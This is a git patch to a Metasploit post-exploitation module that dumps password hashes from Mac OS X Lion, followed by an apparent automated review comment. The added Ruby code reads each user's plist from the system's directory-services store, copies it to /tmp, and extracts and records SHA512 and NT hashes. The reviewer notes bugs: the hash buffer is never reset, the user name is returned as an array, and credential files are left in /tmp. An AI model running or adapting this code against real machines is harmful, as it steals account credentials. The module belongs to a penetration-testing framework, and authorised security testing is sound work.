From b8a232eaf56271025c68571824d8d2983362268f Mon Sep 17 00:00:00 2001
From: Carlos Perez
Date: Thu, 7 Jul 2011 03:46:33 +0000
Subject: [PATCH] Support for dumping OSX Lion SHA512 Salted hashes, thanks to hammackj for helping in figuring out how to parse the new format
git-svn-id: file:///home/svn/framework3/trunk@13111 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/post/osx/gather/hashdump.rb | 50 ++++++++++++++++++++++++++++-
 1 file changed, 49 insertions(+), 1 deletion(-)
diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index a4f4c8d48d..961251a8da 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
 This module dumps SHA1, LM and NT Hashes of Mac OS X Tiger, Leopard and Snow Leopard Systems.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'Carlos Perez '],
+ 'Author' => [ 'Carlos Perez ','hammackj '],
 'Version' => '$Revision$',
 'Platform' => [ 'osx' ],
 'SessionTypes' => [ "shell" ]
@@ -151,6 +151,54 @@ class Metasploit3 < Msf::Post
 when /shell/
 guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
 end
+ elsif ver_num =~ /10\.(7)/
+ require 'rexml/document'
+ hash_decoded = ""
+ profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
+ if profiles
+ profiles.each do |p|
+ next if p =~ /^_/
+ next if p =~ /^daemon|root|nobody/
+ cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
+ cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
+ file = cmd_exec("cat /tmp/#{p.chomp}")
+ doc = REXML::Document.new(file)
+ hash_text = doc.elements.to_a("///array")[2].elements["data"].text.gsub("\n\t\t","")
+ hash_text.unpack('m')[0].each_byte do |b|
+ hash_decoded << sprintf("%02X", b)
+ end
+ user = p.scan(/(\S*)\.plist/)
+ sha512 = hash_decoded.slice(104..213)
+ nt_hash = hash_decoded.slice(214..249)
+
+ print_status("SHA512:#{user}:#{sha512}")
+ file_local_write(sha1_file,"#{user}:#{sha512}")
+ report_auth_info(
+ :host => host,
+ :port => 0,
+ :sname => 'sha512',
+ :user => user,
+ :pass => sha512,
+ :active => false
+ )
+
+ if nt_hash !~ /000000000000000/
+ print_status("NT:#{user}:#{nt_hash}")
+ file_local_write(nt_file,"#{user}:#{nt_hash}")
+ report_auth_info(
+ :host => host,
+ :port => 445,
+ :sname => 'smb',
+ :user => user,
+ :pass => nt_hash,
+ :active => true
+ )
+ end
+ end
+ end
+ return
+
+ end
 # Extract the hashes
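Review bot: `hash_decoded` is initialised once before `profiles.each` and is only ever appended to inside the loop, so from the second user onward `hash_decoded.slice(104..213)` and `slice(214..249)` still index into the first user's hex string and every later account is reported with the first account's SHA512 and NT hash. Reset the buffer per iteration by making `hash_decoded = ""` the first line of the block, or drop the byte loop entirely with `hash_decoded = hash_text.unpack('m')[0].unpack('H*')[0].upcase`. `user = p.scan(/(\S*)\.plist/)` yields a nested array (`[["bob"]]`) rather than a string, so `:user` in both `report_auth_info` calls receives an Array and the log lines interpolate it; `user = p.sub(/\.plist\z/, '')` gives the intended name. The module also copies each user's plist, which carries the ShadowHashData, into world-readable `/tmp/` and never removes it, leaving credential material on the target for any local user or forensic review to pick up, so add `cmd_exec("rm -f /tmp/#{p.chomp}")` after the `cat`. The method and the `if ver_num` chain this `elsif` joins begin before the hunk, and the closing `end` structure continues past it.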